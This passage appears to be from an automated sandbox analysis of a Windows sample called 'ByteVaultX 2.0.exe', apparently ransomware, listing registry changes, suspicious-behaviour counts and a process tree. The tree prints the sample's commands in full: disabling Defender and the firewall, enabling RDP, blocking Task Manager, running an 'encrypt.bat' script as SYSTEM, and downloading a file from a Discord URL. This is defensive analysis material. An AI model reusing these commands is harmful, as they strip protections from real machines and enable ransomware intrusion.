\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBB} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0298-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0000-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0071-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0168-ABCDEFFEDCBB} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0044-ABCDEFFEDCBB} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0129-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0204-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0079-ABCDEFFEDCBC} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0234-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0082-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0039-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0039-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0132-ABCDEFFEDCBB} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0014-ABCDEFFEDCBB} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0121-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0320-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Extensions\ContractId\Windows.Launch\PackageId\Microsoft.AccountsControl_10.0.15063.0_neutral__cw5n1h2txyewy\ActivatableClassId regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144" MicrosoftEdge.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0092-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0218-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Extensions\ContractId\Windows.BackgroundTasks\PackageId\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivatableClassId\App.AppXw3qcpc7p849541dp39v regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0292-ABCDEFFEDCBC} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0228-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0358-ABCDEFFEDCBB} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0086-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0124-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0085-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0114-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0134-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0197-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0200-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0134-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0273-ABCDEFFEDCBA} regedit.exe -
Runs regedit.exe 2 IoCs
Processes:
regedit.exeregedit.exepid process 3616 regedit.exe 2204 regedit.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4408 powershell.exe 4408 powershell.exe 4408 powershell.exe 1856 powershell.exe 1856 powershell.exe 1856 powershell.exe 1856 powershell.exe 4408 powershell.exe 4408 powershell.exe 4408 powershell.exe 4408 powershell.exe 3608 powershell.exe 3608 powershell.exe 3608 powershell.exe 3608 powershell.exe 4696 powershell.exe 4696 powershell.exe 4696 powershell.exe 4696 powershell.exe 3556 powershell.exe 3556 powershell.exe 3556 powershell.exe 3556 powershell.exe 2596 powershell.exe 2596 powershell.exe 2596 powershell.exe 2596 powershell.exe 3860 powershell.exe 3860 powershell.exe 3860 powershell.exe 3860 powershell.exe 5032 powershell.exe 5032 powershell.exe 5032 powershell.exe 5032 powershell.exe 204 powershell.exe 204 powershell.exe 204 powershell.exe 204 powershell.exe 5004 powershell.exe 5004 powershell.exe 5004 powershell.exe 5004 powershell.exe 5108 powershell.exe 5108 powershell.exe 5108 powershell.exe 5108 powershell.exe 4624 powershell.exe 4624 powershell.exe 4624 powershell.exe 4624 powershell.exe 4344 powershell.exe 4344 powershell.exe 4344 powershell.exe 4344 powershell.exe 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 1436 powershell.exe 4176 powershell.exe 4176 powershell.exe 4176 powershell.exe 4176 powershell.exe 748 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
regedit.exepid process 2204 regedit.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
MicrosoftEdgeCP.exepid process 368 MicrosoftEdgeCP.exe 368 MicrosoftEdgeCP.exe 368 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exepowershell.exedescription pid process Token: SeDebugPrivilege 4408 powershell.exe Token: SeIncreaseQuotaPrivilege 4408 powershell.exe Token: SeSecurityPrivilege 4408 powershell.exe Token: SeTakeOwnershipPrivilege 4408 powershell.exe Token: SeLoadDriverPrivilege 4408 powershell.exe Token: SeSystemProfilePrivilege 4408 powershell.exe Token: SeSystemtimePrivilege 4408 powershell.exe Token: SeProfSingleProcessPrivilege 4408 powershell.exe Token: SeIncBasePriorityPrivilege 4408 powershell.exe Token: SeCreatePagefilePrivilege 4408 powershell.exe Token: SeBackupPrivilege 4408 powershell.exe Token: SeRestorePrivilege 4408 powershell.exe Token: SeShutdownPrivilege 4408 powershell.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeSystemEnvironmentPrivilege 4408 powershell.exe Token: SeRemoteShutdownPrivilege 4408 powershell.exe Token: SeUndockPrivilege 4408 powershell.exe Token: SeManageVolumePrivilege 4408 powershell.exe Token: 33 4408 powershell.exe Token: 34 4408 powershell.exe Token: 35 4408 powershell.exe Token: 36 4408 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeDebugPrivilege 5068 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 5068 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 5068 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 5068 MicrosoftEdgeCP.exe Token: SeIncreaseQuotaPrivilege 1856 powershell.exe Token: SeSecurityPrivilege 1856 powershell.exe Token: SeTakeOwnershipPrivilege 1856 powershell.exe Token: SeLoadDriverPrivilege 1856 powershell.exe Token: SeSystemProfilePrivilege 1856 powershell.exe Token: SeSystemtimePrivilege 1856 powershell.exe Token: SeProfSingleProcessPrivilege 1856 powershell.exe Token: SeIncBasePriorityPrivilege 1856 powershell.exe Token: SeCreatePagefilePrivilege 1856 powershell.exe Token: SeBackupPrivilege 1856 powershell.exe Token: SeRestorePrivilege 1856 powershell.exe Token: SeShutdownPrivilege 1856 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeSystemEnvironmentPrivilege 1856 powershell.exe Token: SeRemoteShutdownPrivilege 1856 powershell.exe Token: SeUndockPrivilege 1856 powershell.exe Token: SeManageVolumePrivilege 1856 powershell.exe Token: 33 1856 powershell.exe Token: 34 1856 powershell.exe Token: 35 1856 powershell.exe Token: 36 1856 powershell.exe Token: SeDebugPrivilege 4920 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4920 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4920 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4408 powershell.exe Token: SeIncreaseQuotaPrivilege 4408 powershell.exe Token: SeSecurityPrivilege 4408 powershell.exe Token: SeTakeOwnershipPrivilege 4408 powershell.exe Token: SeLoadDriverPrivilege 4408 powershell.exe Token: SeSystemProfilePrivilege 4408 powershell.exe Token: SeSystemtimePrivilege 4408 powershell.exe Token: SeProfSingleProcessPrivilege 4408 powershell.exe Token: SeIncBasePriorityPrivilege 4408 powershell.exe Token: SeCreatePagefilePrivilege 4408 powershell.exe Token: SeBackupPrivilege 4408 powershell.exe Token: SeRestorePrivilege 4408 powershell.exe Token: SeShutdownPrivilege 4408 powershell.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeSearchUI.exepid process 2756 MicrosoftEdge.exe 368 MicrosoftEdgeCP.exe 5068 MicrosoftEdgeCP.exe 368 MicrosoftEdgeCP.exe 3024 SearchUI.exe 3024 SearchUI.exe 3024 SearchUI.exe 3024 SearchUI.exe 3024 SearchUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ByteVaultX 2.0.exeByteVaultX 2.0.execmd.exeMicrosoftEdgeCP.exepowershell.exedescription pid process target process PID 4112 wrote to memory of 3040 4112 ByteVaultX 2.0.exe ByteVaultX 2.0.exe PID 4112 wrote to memory of 3040 4112 ByteVaultX 2.0.exe ByteVaultX 2.0.exe PID 3040 wrote to memory of 4408 3040 ByteVaultX 2.0.exe powershell.exe PID 3040 wrote to memory of 4408 3040 ByteVaultX 2.0.exe powershell.exe PID 3040 wrote to memory of 168 3040 ByteVaultX 2.0.exe netsh.exe PID 3040 wrote to memory of 168 3040 ByteVaultX 2.0.exe netsh.exe PID 3040 wrote to memory of 4508 3040 ByteVaultX 2.0.exe runas.exe PID 3040 wrote to memory of 4508 3040 ByteVaultX 2.0.exe runas.exe PID 3040 wrote to memory of 2792 3040 ByteVaultX 2.0.exe cmd.exe PID 3040 wrote to memory of 2792 3040 ByteVaultX 2.0.exe cmd.exe PID 2792 wrote to memory of 780 2792 cmd.exe reg.exe PID 2792 wrote to memory of 780 2792 cmd.exe reg.exe PID 2792 wrote to memory of 2748 2792 cmd.exe reg.exe PID 2792 wrote to memory of 2748 2792 cmd.exe reg.exe PID 2792 wrote to memory of 3776 2792 cmd.exe reg.exe PID 2792 wrote to memory of 3776 2792 cmd.exe reg.exe PID 2792 wrote to memory of 4520 2792 cmd.exe reg.exe PID 2792 wrote to memory of 4520 2792 cmd.exe reg.exe PID 2792 wrote to memory of 1856 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 1856 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 4408 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 4408 2792 cmd.exe powershell.exe PID 368 wrote to memory of 4920 368 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 368 wrote to memory of 4920 368 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 368 wrote to memory of 4920 368 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 368 wrote to memory of 4920 368 MicrosoftEdgeCP.exe MicrosoftEdgeCP.exe PID 2792 wrote to memory of 3608 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 3608 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 4696 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 4696 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 3556 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 3556 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 2288 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 2288 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 4640 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 4640 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 2292 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 2292 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 2608 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 2608 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 1540 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 1540 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 2672 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 2672 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 4608 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 4608 2792 cmd.exe netsh.exe PID 2792 wrote to memory of 2596 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 2596 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 3860 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 3860 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 5032 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 5032 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 204 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 204 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 5004 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 5004 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 5108 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 5108 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 4624 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 4624 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 4344 2792 cmd.exe powershell.exe PID 2792 wrote to memory of 4344 2792 cmd.exe powershell.exe PID 4344 wrote to memory of 5104 4344 powershell.exe cmd.exe PID 4344 wrote to memory of 5104 4344 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"2⤵
- Checks computer location settings
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:168 -
C:\Windows\SYSTEM32\runas.exerunas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"3⤵PID:4508
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"4⤵PID:780
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f4⤵PID:2748
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"4⤵PID:3776
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f4⤵PID:4520
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3556 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable4⤵PID:2288
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE4⤵PID:4640
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
PID:2292 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off4⤵
- Modifies Windows Firewall
PID:2608 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off4⤵PID:1540
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵PID:2672
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off4⤵
- Modifies Windows Firewall
PID:4608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:204 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5108 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4624 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"5⤵PID:5104
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"6⤵PID:3928
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f6⤵PID:1304
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"6⤵PID:3652
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f6⤵PID:3956
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵
- Suspicious behavior: EnumeratesProcesses
PID:748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵PID:4356
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵PID:3168
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable6⤵
- Modifies Windows Firewall
PID:4764 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE6⤵PID:3336
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off6⤵
- Modifies Windows Firewall
PID:2964 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off6⤵
- Modifies Windows Firewall
PID:292 -
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off6⤵PID:1804
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off6⤵
- Modifies Windows Firewall
PID:3428 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off6⤵PID:992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"6⤵PID:4696
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"6⤵PID:2052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
PID:2964 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"6⤵PID:2140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"6⤵
- Command and Scripting Interpreter: PowerShell
PID:4820 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"6⤵PID:4736
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"6⤵PID:5108
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"7⤵PID:3852
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"8⤵PID:1536
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f8⤵PID:292
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"8⤵PID:5004
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f8⤵PID:2964
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵
- Command and Scripting Interpreter: PowerShell
PID:4916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵PID:1284
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"8⤵PID:4504
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"8⤵PID:4608
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"8⤵
- Command and Scripting Interpreter: PowerShell
PID:1564 -
C:\Windows\system32\netsh.exenetsh firewall set opmode disable8⤵
- Modifies Windows Firewall
PID:4132 -
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE8⤵PID:2936
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off8⤵
- Modifies Windows Firewall
PID:5108 -
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off8⤵PID:3632
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off8⤵
- Modifies Windows Firewall
PID:1888 -
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off8⤵
- Modifies Windows Firewall
PID:3812 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off8⤵PID:1304
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"8⤵
- Command and Scripting Interpreter: PowerShell
PID:1804 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"8⤵
- Command and Scripting Interpreter: PowerShell
PID:3556 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"8⤵PID:2608
-
